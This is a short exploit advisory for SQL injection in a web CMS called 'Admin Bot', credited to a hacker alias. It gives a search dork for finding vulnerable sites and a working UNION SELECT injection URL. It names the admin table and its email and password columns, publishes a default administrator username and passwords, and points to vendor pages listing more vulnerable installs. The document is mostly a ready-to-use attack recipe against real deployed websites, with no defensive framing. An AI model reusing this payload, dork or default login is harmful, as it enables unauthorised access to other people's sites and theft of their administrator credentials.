Admin Bot suffers from a remote SQL injection vulnerability.
de9dc050aaad37c3eb51ea14797047666f6b19974d56a946c2e4d90fad143e40
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# CMS name : Admin Bot
# Site : Flash2Web.com and carissimi.ch
# Dork : inurl:/news.php?wgo=
# Admin panel : https://www.site.com/admin
# Column number : 8 or 9
# https://www.site.com/news.php?wgo=666+and+1=2+union+all+select+0,1,BALTAZAR,3,4,5,6,7,8--
# Table : admin_user
# Columns : email, password
#
# Default admin login :
# Username: pepe@flash2web.com
# Password: pepe or jactaalea
#
# List of sites vulnerable to default admin login can be found on https://flash2web.com and https://www.carissimi.ch/
# Sites made by www.carissimi.ch are also vulnerable to SQLi
#
# Special greetz to my friend sinner_01
# greetz for d3hydr8, qk, marezzi, fx0, TraXdata, v0da, MikiSoft and all members of ex darkc0de.com, ljuska.org and x0rg.org